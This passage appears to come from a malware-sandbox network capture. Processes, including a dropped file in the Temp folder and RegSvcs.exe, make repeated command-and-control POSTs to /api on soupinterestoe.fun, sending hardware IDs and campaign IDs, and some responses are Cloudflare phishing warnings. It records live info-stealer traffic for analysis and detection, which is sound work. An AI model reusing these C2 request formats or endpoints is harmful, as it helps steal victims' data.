74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e Data Ascii: 1276<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.
Dec 27, 2023 18:12:49.848633051 CET	1286	IN	Data Raw: 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 Data Ascii: css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { wind
Dec 27, 2023 18:12:49.848647118 CET	1286	IN	Data Raw: 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 73 75 63 68 20 61 73 20 70 61 73 73 77 6f 72 64 73 20 61 6e 64 20 63 72 65 64 69 74 20 63 61 72 64 20 64 65 74 61 69 6c 73 20 62 79 20 70 72 65 74 65 6e 64 69 6e 67 20 74 6f 20 62 65 20 61 20 74 72 75 73 74 Data Ascii: information such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form action="/cdn-cgi/phish-bypass" method="GET"> <input type="hidden" name="atok" value="Mye14
Dec 27, 2023 18:12:49.848659039 CET	1286	IN	Data Raw: 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a Data Ascii: :text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">83c330cf1b722cb0</strong></span> <span class="cf-footer-se
Dec 27, 2023 18:12:49.848669052 CET	150	IN	Data Raw: 3e 0a 0a 0a 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 Data Ascii: > </div>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>
Dec 27, 2023 18:12:49.848694086 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Dec 27, 2023 18:12:50.055792093 CET	349	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: soupinterestoe.fun
Dec 27, 2023 18:12:50.055824995 CET	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 4c 47 4e 44 52 59 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30 Data Ascii: act=recive_message&lid=LGNDRY&j=default&ver=4.0
Dec 27, 2023 18:12:50.628814936 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=q6j4fd73tp75l719o19rmovhi8; expires=Sun, 21-Apr-2024 10:59:29 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:50 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:50 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:50 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Hd%2BaLV8PomgXasK4ZSgfY1cBpPRg6zbFhUiHZgQDKB5gFJahPFJFOSnA3JSGGM3Iw%2FuWjlI9nxXAbNpdPLKBlWubfC0uh1Aq5TgXphQifO8g5kBpZZolnG8sBJselUZP2i2PAVs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330d14e0b2 Data Raw: Data Ascii:
Dec 27, 2023 18:12:50.628832102 CET	1286	IN	Data Raw: 62 30 2d 44 46 57 0d 0a 0d 0a 32 31 38 62 0d 0a 50 61 72 44 54 6a 78 2f 61 33 77 32 6f 33 6a 48 54 4c 75 32 72 6d 58 37 44 68 2f 63 46 4d 37 52 6a 39 49 4a 4c 56 62 66 47 49 4e 47 70 38 6c 75 48 46 39 4c 58 6b 43 42 51 75 64 34 6c 37 75 6b 52 64 Data Ascii: b0-DFW218bParDTjx/a3w2o3jHTLu2rmX7Dh/cFM7Rj9IJLVbfGINGp8luHF9LXkCBQud4l7ukRdsuP/5nq/O18n1fI7o0jjeK424cXQoYFJlYoS3XxctJ9gQ//DTu8+qqKxd2hBWJHYrjbhxfEHE8g1jnbJuWjkXZa3H+Lu7z6rhrTDq9eehS2q8tVBMMFFPAHKYg1tPLAJpkcbV5pryt/gQndv84ox2K424eGhFeDIN
Dec 27, 2023 18:12:50.628845930 CET	1286	IN	Data Raw: 2f 79 4b 51 31 32 2f 7a 72 6d 55 34 6a 35 62 68 34 5a 44 52 4a 55 78 68 53 68 4b 4e 54 54 78 77 71 54 61 33 47 33 66 71 65 7a 34 62 39 6f 53 54 79 32 66 65 74 58 77 71 49 6b 58 6c 31 48 63 54 79 44 57 4f 64 73 6d 35 61 4f 52 64 6c 72 5a 66 34 75 Data Ascii: /yKQ12/zrmU4j5bh4ZDRJUxhShKNTTxwqTa3G3fqez4b9oSTy2fetXwqIkXl1HcTyDWOdsm5aORdlrZf4u7vPWvXtCP/0ViR2K424cXxZQO6lY52yblo4e9gQ//DTu8a/yKQ8zsTq5HYipLFgeBB9YxhGuJdXbxAeRYni9eKay6r5uTzO1de1UzuFiMXVLXBaDWOdsm5TLH9k0P/5ap7f7qysgXP84ox2K4zMQcmFcFoNY52zAu
Dec 27, 2023 18:12:50.628858089 CET	1286	IN	Data Raw: 75 33 66 6b 55 4d 4b 7a 4a 46 41 51 41 68 46 66 30 78 71 6f 4b 74 58 51 78 41 79 54 4c 44 50 52 48 75 37 78 72 2f 49 70 44 58 62 2f 4f 75 5a 48 69 50 6c 75 48 69 67 45 45 56 54 43 44 4f 56 42 73 5a 61 4f 52 64 73 75 50 36 45 34 77 39 75 76 38 69 Data Ascii: u3fkUMKzJFAQAhFf0xqoKtXQxAyTLDPRHu7xr/IpDXb/OuZHiPluHigEEVTCDOVBsZaORdsuP6E4w9uv8ikNdv9jjjeK424cX0tcFoEdqW6BlowLl2xysnqnu+y8ZUgxtHLpTcmlJF8TBh9QxB+hKd3Sw0fXAxX8NO7xr/IpDXS6YqEHiuEDeShLP26Bdc1sm5aORdtzM9Ee7vGv8ikNLdISox2K424cX0teU81a/WyZ2M8LkWN
Dec 27, 2023 18:12:50.788708925 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:12:51.170576096 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=tbj50iv4kutv16ij0jiemtufuv; expires=Sun, 21-Apr-2024 10:59:30 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sK2q3W4owANP9FVwj5%2BwKFnCLe%2Bq8l7ElKX0FbQoxMqLo3TRO7hoJ49DrYA5x4wn8N4v3KMiTqPBVuWc%2BmCFNibUJQU6%2BHnBBATLRVBiTdgCfPkKbby0wP%2B4SVUejFIPRvVEYj4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330d Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49751	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:49.870971918 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:12:49.871032953 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:12:50.411356926 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=m16704sucospmkrml625v107ks; expires=Sun, 21-Apr-2024 10:59:29 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:50 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:50 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:50 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3I%2Ffqmda8c1f0GEXV2eBJvuJUXepVNL9A3sJ1nBEl9AdsYPYyZifQ9CkXEfFqxjWvzjFcVseFQmQPKIZXpbtmOvZxbTHcVBjIOZ7E%2FXyfurpX1zG3dW%2BHSLpLDoXQovuqhBGmXE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330d01e6 Data Raw: Data Ascii:
Dec 27, 2023 18:12:50.411370993 CET	39	IN	Data Raw: 36 38 66 61 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 68fa-DFW15Malformed packet data
Dec 27, 2023 18:12:50.411381006 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49752	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:50.747595072 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:12:50.747703075 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:12:52.292090893 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=oqebf1m7knb55n2p3h7f18g7vh; expires=Sun, 21-Apr-2024 10:59:31 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=duWbzxOxmmDNEv8iZE0bjvX%2FVVP9yAWvpbCPHKXYNC5bB6QQggv12PycZGoRwlC1FY1cFTTdJq7jRhIPb6zEtr7NraEHEVSdAY9mTmxTj1u633pK5K1v3NFpzvxYPgXZY2f6SbA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330d59df9e97 Data Raw: Data Ascii:
Dec 27, 2023 18:12:52.292128086 CET	35	IN	Data Raw: 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: -DFW15Malformed packet data
Dec 27, 2023 18:12:52.292140961 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49754	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:51.481102943 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:12:51.481492996 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:12:52.015573978 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=9fikvu4dtar9tr1hafed44kaga; expires=Sun, 21-Apr-2024 10:59:30 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hTOZzjWKKereTGpIy2JtGYyoJxjfQOT0nrJYqxXDwhXSzayi86VPqwMNZlfjeNIuAZy8UTVyFYp3bvr9nBiyMG0fzDiNF93mltjnqjNwuRvaqSJQTJUnIfSK69zvmFjFoA1FQq0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330da2f716c80- Data Raw: Data Ascii:
Dec 27, 2023 18:12:52.015588045 CET	33	IN	Data Raw: 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: FW15Malformed packet data
Dec 27, 2023 18:12:52.015599012 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49757	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:52.175209999 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:12:52.175410032 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:12:52.714787006 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=ir25ts2g4ip4q8chpkacchm318; expires=Sun, 21-Apr-2024 10:59:31 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mHXPJ2N8Fy8q8q85KjaRJclIb7Ngt%2FH%2F70CBMc90E3Zl12PasJrOj9I6f0MkqsS7cylgFu7g1%2B6YkSklCQO80%2FFT%2BBtbiupwdPeIx35CS%2F0WH52LN6v4vaJu0IKrU4zpKv2Gpc0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c33 Data Raw: Data Ascii:
Dec 27, 2023 18:12:52.714801073 CET	45	IN	Data Raw: 64 65 37 38 33 65 36 62 62 36 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: de783e6bb6-DFW15Malformed packet data
Dec 27, 2023 18:12:52.714811087 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49758	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:52.460855007 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:12:52.460915089 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:12:52.993444920 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=2skmujr7bp27fpm6s2ju35v10d; expires=Sun, 21-Apr-2024 10:59:31 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oWXk5h%2FzvNtnu1fy5PeLbqOnACKnjGhrTdf7M1S9POpRd6eGcbsLuAxnxyph%2BUFL3Mcb3U9EwEmOsFACXdkiLdf368JkXrKyhK14XJXZPjayblcJp9ZPcknx2M0w7vmlQ9AiVmA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330e048214 Data Raw: Data Ascii:
Dec 27, 2023 18:12:52.993458033 CET	37	IN	Data Raw: 65 65 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: ee-DFW15Malformed packet data
Dec 27, 2023 18:12:52.993468046 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
